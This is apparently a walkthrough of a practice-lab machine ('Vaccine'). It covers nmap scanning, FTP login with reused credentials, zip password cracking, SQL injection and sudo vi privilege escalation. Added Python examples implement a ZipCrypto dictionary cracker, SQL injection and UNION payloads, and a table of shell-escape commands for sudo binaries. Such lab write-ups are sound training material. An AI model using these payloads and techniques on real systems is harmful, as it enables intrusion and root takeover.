# nmap -sC -sV -v -Pn 10.10.10.46
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-21 13:59 EDT
............................
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
| 256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
|_ 256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
We have a Linux box here with ports 21, 22 and 80 open.
Browsing to http://10.10.10.46 shows a login page:
Let's run a directory scan against this web server with gobuster:
Apparently the server has no obvious vulnerability. Let's move on to other possibilities.
Exploitation
In the previous lab (the Oopsie machine), we found FTP credentials:
user: ftpuser
pass: mc@F1l3ZilL4
Let's connect to the server's FTP service with the credentials above:
# ftp 10.10.10.46
Connected to 10.10.10.46.
220 (vsFTPd 3.0.3)
Name (10.10.10.46:vergani): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Let's download the backup.zip file:
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 2533 Feb 03 2020 backup.zip
226 Directory send OK.
ftp> get backup.zip
local: backup.zip remote: backup.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
226 Transfer complete.
2533 bytes received in 0.00 secs (20.2996 MB/s)
When we try to unzip the file, it asks for a password!
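Password-protected archives produced by the usual zip tools use PKWARE's legacy ZipCrypto scheme unless AES was explicitly requested, and the standard route is zip2john to extract the crackable blob and then john or hashcat with a wordlist. The script below is an added illustration, not part of this writeup and not code from the target: it reimplements ZipCrypto from the APPNOTE description, builds a constructed encrypted entry under a made-up password (b"s3cret!"), and recovers that password with a dictionary using the same cheap header check-byte filter the crackers rely on. Nothing in it comes from the real backup.zip.

```python
import zlib

# Added illustration: PKWARE "traditional" ZIP encryption (ZipCrypto),
# reimplemented from the APPNOTE description so the attack can run offline.
# The password, file body and header bytes below are constructed; nothing
# here is taken from the real backup.zip.

_CRC_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRC_TABLE.append(_c)


def _crc32_update(crc, b):
    """One table step of CRC-32 without the usual pre/post inversion."""
    return _CRC_TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)


class ZipCrypto:
    """Keystream state for one encrypted entry, seeded from the password."""

    def __init__(self, password):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for c in password:
            self._update(c)

    def _update(self, c):
        self.k0 = _crc32_update(self.k0, c)
        self.k1 = ((self.k1 + (self.k0 & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc32_update(self.k2, self.k1 >> 24)

    def _stream_byte(self):
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, data):
        out = bytearray()
        for p in data:
            out.append(p ^ self._stream_byte())
            self._update(p)  # the keys advance on the plaintext byte
        return bytes(out)

    def decrypt(self, data):
        out = bytearray()
        for c in data:
            p = c ^ self._stream_byte()
            self._update(p)
            out.append(p)
        return bytes(out)


def make_encrypted_entry(password, plaintext, header_seed):
    """Ciphertext of one stored (uncompressed) entry: 12-byte header + body.
    Byte 11 of the header is the high byte of the body's CRC-32; that is the
    only thing an unzip tool checks before trusting a password."""
    crc = zlib.crc32(plaintext) & 0xFFFFFFFF
    header = header_seed[:11] + bytes([crc >> 24])
    return ZipCrypto(password).encrypt(header + plaintext), crc


def crack(ciphertext, crc, wordlist):
    """Dictionary attack: the header check byte rejects 255 of every 256
    wrong guesses almost for free; only survivors pay for a full decrypt
    plus CRC verification, which weeds out the false positives."""
    check = (crc >> 24) & 0xFF
    for pw in wordlist:
        ks = ZipCrypto(pw)
        if ks.decrypt(ciphertext[:12])[11] != check:
            continue
        body = ks.decrypt(ciphertext[12:])  # keystream continues seamlessly
        if zlib.crc32(body) & 0xFFFFFFFF == crc:
            return pw, body
    return None, None


# Constructed sample: a stand-in entry protected with a weak password.
SAMPLE_PASSWORD = b"s3cret!"
SAMPLE_PLAINTEXT = b"<?php // constructed stand-in for the archived file ?>\n"
SAMPLE_CIPHERTEXT, SAMPLE_CRC = make_encrypted_entry(
    SAMPLE_PASSWORD, SAMPLE_PLAINTEXT, b"constructed"
)
WORDLIST = [b"password", b"123456", b"MegaCorp", b"s3cret!", b"letmein"]

if __name__ == "__main__":
    pw, body = crack(SAMPLE_CIPHERTEXT, SAMPLE_CRC, WORDLIST)
    print("password:", pw)
    print("recovered:", body)
```

A real archive adds two things this sample skips: the 12 header bytes are random per entry (the CRC check byte still sits in position 11), and deflated entries must be inflated after decryption before the CRC can be verified. The check byte is only 8 bits, which is why john and hashcat still confirm every survivor with a full CRC rather than trusting it.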
Let's go back to the dashboard at http://10.10.10.46/ and log in with the credentials we found:
Let's now try some SQL injection. If we type, for example, the letter "a" in the search field, the URL becomes http://10.10.10.46/dashboard.php?search=a
If we repeat the test above, this time watching the request in the browser's developer tools, we see that our logged-in session cookie is:
Cookie: PHPSESSID=5ko3ado4ett9ac6cmeu2qrj79s
Let's put all of this information together and feed it to sqlmap:
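Before handing the request to sqlmap (which needs the URL with the search parameter and the PHPSESSID value via --cookie so it stays logged in), it helps to see what the tool is actually testing for. The example below is added here and is not the site's code: dashboard.php's source is not shown on this page, so a constructed SQLite stand-in reproduces the classic pattern of concatenating ?search= into a LIKE clause, runs the boolean-based check that sqlmap starts with, shows the same check failing against a parameterized version, and then uses a UNION to read the database catalogue. Table rows and names are constructed.

```python
import sqlite3

# Added illustration, not the site's code: the real dashboard.php source is
# not on this page, so this stand-in reproduces the classic pattern of
# splicing ?search= into a LIKE clause. SQLite stands in for PostgreSQL so
# the demo runs offline; the injection logic is the same.


def setup_db():
    """In-memory table with constructed rows (not data from the target)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cars (name TEXT, type TEXT, fuel TEXT, engine TEXT)")
    conn.executemany(
        "INSERT INTO cars VALUES (?, ?, ?, ?)",
        [
            ("Alpha", "Sedan", "Petrol", "1600cc"),
            ("Beacon", "Hatchback", "Diesel", "1200cc"),
            ("Comet", "Sports", "Electric", "n/a"),
        ],
    )
    return conn


def search_vulnerable(conn, term):
    """Vulnerable: the search term is concatenated straight into the SQL."""
    sql = "SELECT name, type FROM cars WHERE name LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Fixed: a bound parameter can never break out of the string literal."""
    return conn.execute(
        "SELECT name, type FROM cars WHERE name LIKE ?", ("%" + term + "%",)
    ).fetchall()


def boolean_probe(search, base="a"):
    """What sqlmap's boolean-based test does: append an always-true and an
    always-false condition to a term that normally returns rows. If the
    true case matches the baseline and the false case does not, the input
    is being evaluated as SQL. The trailing -- comments out the closing
    %' that the application appends."""
    baseline = search(base)
    if not baseline:
        raise ValueError("pick a base term that returns rows")
    true_case = search(base + "%' AND 1=1--")
    false_case = search(base + "%' AND 1=2--")
    return true_case == baseline and false_case != baseline


def dump_schema_via_union(conn):
    """Once injection is confirmed, a UNION with the same column count pulls
    rows from other tables; here the sqlite_master catalogue (on PostgreSQL
    one would target information_schema or pg_tables)."""
    return search_vulnerable(
        conn, "zzz%' UNION SELECT name, sql FROM sqlite_master--"
    )


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable endpoint injectable:", boolean_probe(lambda t: search_vulnerable(db, t)))
    print("fixed endpoint injectable:     ", boolean_probe(lambda t: search_safe(db, t)))
    for row in dump_schema_via_union(db):
        print(row)
```

The `--` comment terminator works on both SQLite and PostgreSQL, which is why the same probe transfers to the real dashboard; against a parameterized query the whole payload is just a literal that matches no car name, so the true case no longer equals the baseline and the probe reports nothing.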
Let's SSH directly into the host (10.10.10.46) with the credentials we found:
# ssh postgres@10.10.10.46
The authenticity of host '10.10.10.46 (10.10.10.46)' can't be established.
ECDSA key fingerprint is SHA256:eVsQ4RXbKR9eOZaXSlMmyuKTDOQ39NAb4vD+GOegBvk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.46' (ECDSA) to the list of known hosts.
postgres@10.10.10.46's password:
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-29-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 22 Sep 2021 02:50:23 PM UTC
System load: 0.38 Processes: 190
Usage of /: 32.0% of 19.56GB Users logged in: 0
Memory usage: 17% IP address for ens160: 10.10.10.46
Swap usage: 0%
47 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
postgres@vaccine:~$
Now that we have a valid Linux password, we can use it to check whether there is any program we are allowed to run with root privileges:
postgres@vaccine:/home/simon$ sudo -l
[sudo] password for postgres:
Matching Defaults entries for postgres on vaccine:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
We can run /bin/vi with superuser privileges. Let's run exactly the command listed above:
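The interesting part of that sudo -l entry is the binary, not the file it is allowed to edit: vi runs shell commands with :! (or :set shell=/bin/sh followed by :shell), and under sudo those run as root. The script below is an added helper, not part of the original writeup: it parses sudo -l output and flags rules whose binary has a known shell escape. The vi rule in the sample is the one from this box; the second rule is constructed to exercise NOPASSWD and comma-separated command lists, and the escape table is a small subset of the usual GTFOBins entries.

```python
import re

# Added illustration, not part of the original writeup: parse `sudo -l`
# output and flag allowed commands whose binary can spawn a shell from
# inside, so a path restriction like "/bin/vi <file>" is no restriction at all.

# Known escapes (a subset of the GTFOBins list); the value is the keystroke
# or argument that gets a shell once the binary is running as root.
SHELL_ESCAPES = {
    "vi": ":!/bin/sh   (or :set shell=/bin/sh, then :shell)",
    "vim": ":!/bin/sh",
    "less": "!/bin/sh",
    "more": "!/bin/sh",
    "man": "!/bin/sh",
    "nano": "^R ^X, then: reset; sh 1>&0 2>&0",
    "find": ". -exec /bin/sh \\; -quit",
    "awk": "'BEGIN {system(\"/bin/sh\")}'",
    "perl": "-e 'exec \"/bin/sh\";'",
    "python3": "-c 'import os; os.system(\"/bin/sh\")'",
}

# One sudoers rule as sudo -l prints it: "(runas) [TAG: ...] cmd[, cmd ...]"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudo_l(output):
    """Return the allowed-command rules listed after the 'may run' header."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            rules.append({
                "runas": m.group("runas").strip(),
                "nopasswd": "NOPASSWD" in m.group("tags"),
                "command": cmd.strip(),
            })
    return rules


def flag_shell_escapes(rules):
    """(command, how-to-escape) for every rule whose binary is in the table,
    plus anything granted as ALL."""
    findings = []
    for r in rules:
        if r["command"] == "ALL":
            findings.append((r["command"], "unrestricted"))
            continue
        binary = r["command"].split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_ESCAPES:
            findings.append((r["command"], SHELL_ESCAPES[binary]))
    return findings


# The first rule is the one from this box's `sudo -l` output above; the
# second line is constructed to exercise NOPASSWD and comma-separated lists.
SAMPLE_OUTPUT = """Matching Defaults entries for postgres on vaccine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
    (root) NOPASSWD: /usr/bin/find, /usr/bin/apt
"""

if __name__ == "__main__":
    for command, escape in flag_shell_escapes(parse_sudo_l(SAMPLE_OUTPUT)):
        print(f"{command}\n    -> shell via: {escape}")
```

The table is deliberately short; a real audit would also cover editors and pagers configured through EDITOR or PAGER, and binaries such as apt that execute hooks, so treat a clean result from this script as "nothing obvious" rather than "safe".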